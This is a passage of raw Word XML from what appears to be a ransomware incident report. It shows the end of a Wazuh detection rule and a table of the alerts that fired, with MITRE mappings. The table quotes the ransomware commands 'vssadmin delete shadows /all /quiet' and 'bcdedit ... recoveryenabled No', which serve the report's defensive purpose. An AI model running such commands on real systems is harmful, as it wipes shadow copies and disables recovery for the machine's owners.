        </w:rPr>
        <w:t xml:space="preserve">if_group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;sysmon_event1&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if_group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"win.eventdata.commandLine"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;recoveryenabled&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;CRITICAL: Ransomware Defense Evasion - Boot Recovery Disabled via BCDedit (MITRE T1490)&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mitre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;T1490&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mitre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;ransomware,defense_evasion,&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_4cd856483c261f88f781a6d59c590ba202d5a77"/>
      <w:r>
        <w:t xml:space="preserve">4.2 Comprehensive Inventory of Rules Triggered During the Incident</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1721"/>
        <w:gridCol w:w="1721"/>
        <w:gridCol w:w="1721"/>
        <w:gridCol w:w="1377"/>
        <w:gridCol w:w="1377"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Severity Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rule Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Description &amp; Signature Match</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">100100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">14 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sysmon, ransomware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL: Ransomware Behavior Detected - Volume Shadow Copies Deletion</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vssadmin delete shadows /all /quiet</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1490</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Inhibit System Recovery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">100101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">12 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sysmon, defense_evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL: Ransomware Defense Evasion - Boot Recovery Disabled</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bcdedit /set {default} recoveryenabled No</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1490</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Inhibit System Recovery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">61618</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">12 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sysmon, process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon - Suspicious Process Creation - svchost.exe / service host tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1059</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Command &amp; Scripting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">60122</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">5 (Warning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">windows, logon_failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Logon failure - Unknown user or bad password</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Windows Security Event ID 4625 via SMB brute-force)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1110</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Brute Force)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">60106</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">3 (Info)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">windows, logon_success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Logon Success</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Windows Security Event ID 4624 - Remote Network Logon Type 3 via WinRM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1078</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Valid Accounts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">61138</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">5 (Warning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">windows, service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">New Windows Service Created</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Windows System Event ID 7045)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1543.003</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Windows Service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">61104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">3 (Info)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">windows, service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Service startup type was changed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Windows System Event ID 7040)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1562.001</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Disable Tools)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">550</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">7 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">syscheck, fim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Integrity checksum changed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Modifications to document files and ransom note content)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1486</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Data Encrypted for Impact)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">553</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">7 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">syscheck, fim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">File deleted</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Adversary deleting original</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Quarterly_Report_*.docx</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">records)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1485</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Data Destruction)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">554</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">5 (Warning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">syscheck, fim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
